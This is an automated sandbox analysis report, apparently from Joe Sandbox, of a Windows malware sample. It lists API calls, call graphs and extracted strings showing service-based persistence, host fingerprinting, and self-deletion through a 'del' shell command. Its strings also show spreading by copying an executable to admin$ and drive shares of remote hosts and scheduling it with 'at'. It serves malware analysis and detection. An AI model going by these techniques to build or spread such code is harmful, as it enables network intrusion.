1371->1373 1372 4059c7 1381 405b10 28 API calls 1372->1381 1376 4059e7 1407 40355b LoadLibraryA 6CFC6DE0 GetModuleFileNameA GetShortPathNameA GetEnvironmentVariableA 1376->1407 1380 40599d 1379->1380 1380->1371 1380->1372 1382 405c64 1381->1382 1383 405d26 1381->1383 1418 406bd0 LoadLibraryA 6CFC6DE0 1382->1418 1384 405d29 OpenSCManagerA 1383->1384 1386 406033 1384->1386 1387 405d5b ChangeServiceConfig2A 1384->1387 1412 40604d 1386->1412 1398 405e2a 1387->1398 1388 405c6b 1389 406bd0 2 API calls 1388->1389 1391 405c79 1389->1391 1393 406bd0 2 API calls 1391->1393 1395 405c84 1393->1395 1396 406bd0 2 API calls 1395->1396 1397 405c8f 1396->1397 1399 406bd0 2 API calls 1397->1399 

                                Callgraph

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405992
                                  • Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                  • Part of subcall function 004059F4: 6CFC6DE0.KERNEL32(00000000), ref: 00405A10
                                  • Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                  • Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
                                  • Part of subcall function 004059F4: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
                                • ExitProcess.KERNEL32 ref: 004059EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CtrlDispatcherExitLibraryLoadOpenProcessServiceStartStartup_mbscat_mbscpy
                                • String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
                                • API String ID: 2992414417-1370363722
                                • Opcode ID: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
                                • Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
                                • Opcode Fuzzy Hash: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
                                • Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B50
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B61
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B72
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B83
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B98
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BA9
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BBA
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BCB
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BDC
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BED
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BFE
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405C0C
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
                                • strlen.MSVCRT ref: 00405C3F
                                • strncmp.MSVCRT ref: 00405C53
                                • wsprintfA.USER32 ref: 00405CB5
                                • _mbscat.MSVCRT ref: 00405CC7
                                • _mbscat.MSVCRT ref: 00405CDA
                                • memset.MSVCRT ref: 00405D00
                                • _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00405D45
                                • ChangeServiceConfig2A.ADVAPI32(?,00000001,Defghijk Mnopqrstu Wxyabcd Fghijklm Opq), ref: 00405DA9
                                • GetLastError.KERNEL32 ref: 00405E3E
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: 6CFC6DE0.KERNEL32(00000000), ref: 00406BE2
                                • _mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
                                • _mbscat.MSVCRT ref: 00405F9D
                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00405FB8
                                • lstrlen.KERNEL32(004059DB), ref: 00406014
                                  • Part of subcall function 0040604D: RegCloseKey.KERNEL32(?,0040603C), ref: 00406083
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$_mbscat$Open_mbscpy$ChangeCloseConfig2DirectoryErrorFileLastManagerModuleNameServiceWindowslstrlenmemsetstrlenstrncmpwsprintf
                                • String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
                                • API String ID: 397004274-766656692
                                • Opcode ID: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
                                • Instruction ID: cb804ed11c5d1b7d2f4ad966b6bff0d4186705c14a699b97b59b11ec4e5a602e
                                • Opcode Fuzzy Hash: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
                                • Instruction Fuzzy Hash: BCE168B1C0426CABDB229B65CC49BDEBEBCAF15744F0440EAE10CB6191C7B95B848F65

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405A10
                                • _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                • _mbscat.MSVCRT ref: 00405AD7
                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadOpen_mbscat_mbscpy
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 3494547092-1712674794
                                • Opcode ID: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
                                • Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
                                • Opcode Fuzzy Hash: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
                                • Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00403571
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00403578
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                • SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                • GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                • SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                • GetCurrentThread.KERNEL32 ref: 0040369B
                                • SetThreadPriority.KERNEL32(00000000), ref: 004036A2
                                • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Priority$ClassCurrentNameThread$ChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcessShellShortVariable
                                • String ID: > nul$/c del $<$COMSPEC$KERNEL32.dll$O$e$lstrcatA$n$p
                                • API String ID: 3031387768-2260071220
                                • Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
                                • Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                • String ID:
                                • API String ID: 801014965-0
                                • Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
                                • Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 76 40604d-406053 77 406061-406067 76->77 78 406055 76->78 79 406075-40607b 77->79 80 406069 77->80 78->77 81 406089-40608e call 40355b 79->81 82 40607d-406083 RegCloseKey 79->82 80->79 82->81
                                APIs
                                • RegCloseKey.KERNEL32(?,0040603C), ref: 00406083
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
                                • Instruction ID: 1f8c146e6fe937cb65407d64c7b6e595c96462481ae191be37c374c023957cce
                                • Opcode Fuzzy Hash: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
                                • Instruction Fuzzy Hash: D9E00235C512699BCF72AF54CC8869DBA79AF00302F5501FAB10D781608B392FD0DE04

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 534 406090-40623a LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 GetSystemDefaultUILanguage memset 536 40625c-406263 534->536 537 40623c-406259 _mbscpy 534->537 538 406265-40626c 536->538 539 40628b-406292 536->539 537->536 538->539 540 40626e-406288 _mbscpy 538->540 541 406294-40629b 539->541 542 4062bd-4062c4 539->542 540->539 541->542 543 40629d-4062ba _mbscpy 541->543 544 4062c6-4062cd 542->544 545 4062ef-4062f6 542->545 543->542 544->545 546 4062cf-4062ec _mbscpy 544->546 547 4062f8-4062ff 545->547 548 40634d-406354 545->548 546->545 547->548 549 406301-40630c 547->549 550 406356-40635d 548->550 551 4063ac-4063b3 548->551 552 40632d-40634a _mbscpy 549->552 553 40630e-40632b _mbscpy 549->553 550->551 554 40635f-40636b 550->554 555 4063b5-4063bc 551->555 556 40640e-406415 551->556 557 40638c-4063a9 _mbscpy 554->557 558 40636d-40638a _mbscpy 554->558 555->556 559 4063be-4063ca 555->559 560 406440-406508 sprintf _mbscpy lstrcpy 556->560 561 406417-40641e 556->561 557->551 558->551 562 4063cc-4063ec _mbscpy 559->562 563 4063ee-40640b _mbscpy 559->563 566 4065d6-406652 _mbscpy 560->566 567 40650e-4065d4 RegQueryValueExA GetSystemInfo memset sprintf _mbscpy 560->567 561->560 564 406420-40643d _mbscpy 561->564 562->556 563->556 564->560 568 406655-4066e5 GlobalMemoryStatusEx call 4069e0 * 2 wsprintfA malloc GetAdaptersInfo 566->568 567->568 574 406704-406713 GetAdaptersInfo 568->574 575 4066e7-406701 free malloc 568->575 576 406953-406967 free 574->576 577 406719-40671d 574->577 575->574 578 406974-406986 576->578 579 406969-40696f GetTickCount 576->579 577->576 580 406723-40673b strcmp 577->580 579->578 581 406741-406781 GetIfTable 580->581 582 406946-40694e 580->582 581->582 583 406787-4067af ??2@YAPAXI@Z 581->583 582->577 583->582 584 4067b5-4067d7 GetIfTable 583->584 585 40692b-406943 ??3@YAXPAX@Z 584->585 586 4067dd-406806 584->586 585->582 586->585 588 40680c-406826 586->588 589 406926 588->589 590 40682c-406846 588->590 590->589 591 40684c-40686e 590->591 591->589 592 406874-4068af 591->592 593 4068f1-406923 sprintf _mbscpy 592->593 594 4068b1-4068ef sprintf _mbscpy 592->594 593->589 594->589
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,6CFC6DE0), ref: 004060A4
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004060AB
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004060C8
                                • GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                • memset.MSVCRT ref: 004060F2
                                • _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                • _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                • _mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
                                • _mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
                                • _mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
                                • _mbscpy.MSVCRT(0000005D,2008), ref: 00406345
                                • _mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
                                • _mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
                                • _mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
                                • _mbscpy.MSVCRT(0000005D,2012), ref: 00406406
                                • _mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
                                • sprintf.MSVCRT ref: 0040649C
                                • _mbscpy.MSVCRT(0000005D,?), ref: 004064B3
                                • lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
                                • RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
                                • GetSystemInfo.KERNEL32(?), ref: 0040655F
                                • memset.MSVCRT ref: 00406570
                                • sprintf.MSVCRT ref: 004065B5
                                • _mbscpy.MSVCRT(-00000003,?), ref: 004065CC
                                • _mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
                                • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00406666
                                • __aulldiv.LIBCMT ref: 00406681
                                • __aulldiv.LIBCMT ref: 0040668F
                                • wsprintfA.USER32 ref: 004066B4
                                • malloc.MSVCRT ref: 004066C9
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
                                • free.MSVCRT ref: 004066EB
                                • malloc.MSVCRT ref: 004066F8
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _mbscpy$Infosprintf$AdaptersLibraryLoadSystemTable__aulldivmallocmemset$??2@DefaultGlobalLanguageMemoryQueryStatusValuefreelstrcpystrcmpwsprintf
                                • String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
                                • API String ID: 2090821033-2163519892
                                • Opcode ID: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
                                • Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
                                • Opcode Fuzzy Hash: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
                                • Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: sprintf$memset$LibraryLoad$Sleep$ExecFileLocalModuleNameTimelstrcmp
                                • String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$at \\%s %d:%d %s$lstrcpyA$mpr.dll
                                • API String ID: 1199448054-2568294205
                                • Opcode ID: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
                                • Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
                                • Opcode Fuzzy Hash: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
                                • Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405261
                                • FindResourceA.KERNEL32(?,?,?), ref: 00405272
                                • LoadResource.KERNEL32(?,00000000), ref: 00405291
                                • LockResource.KERNEL32(00000000), ref: 004052A9
                                • wsprintfA.USER32 ref: 004052C4
                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
                                • lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
                                • WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
                                • CloseHandle.KERNEL32(00000000), ref: 00405326
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResource$LoadWrite$CloseFindHandleLibraryLockPointerlstrlenwsprintf
                                • String ID: SizeofResource$hra%u.dll$kernel32.dll
                                • API String ID: 496033514-2774179399
                                • Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
                                • Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00403E70,Defghi Klmnopqr Tuv), ref: 00403523
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
                                • DeleteService.ADVAPI32(00000000), ref: 0040354C
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403556
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandleOpen$DeleteManager
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 204194956-1553144822
                                • Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
                                • Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9
                                APIs
                                • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00403706
                                • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040371F
                                • recv.WS2_32(?,?,?,00000000), ref: 00403738
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID:
                                • API String ID: 741273618-0
                                • Opcode ID: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
                                • Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
                                • Opcode Fuzzy Hash: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
                                • Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004055E1
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004055F4
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405602
                                • Sleep.KERNEL32(000001F4), ref: 00405663
                                • LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
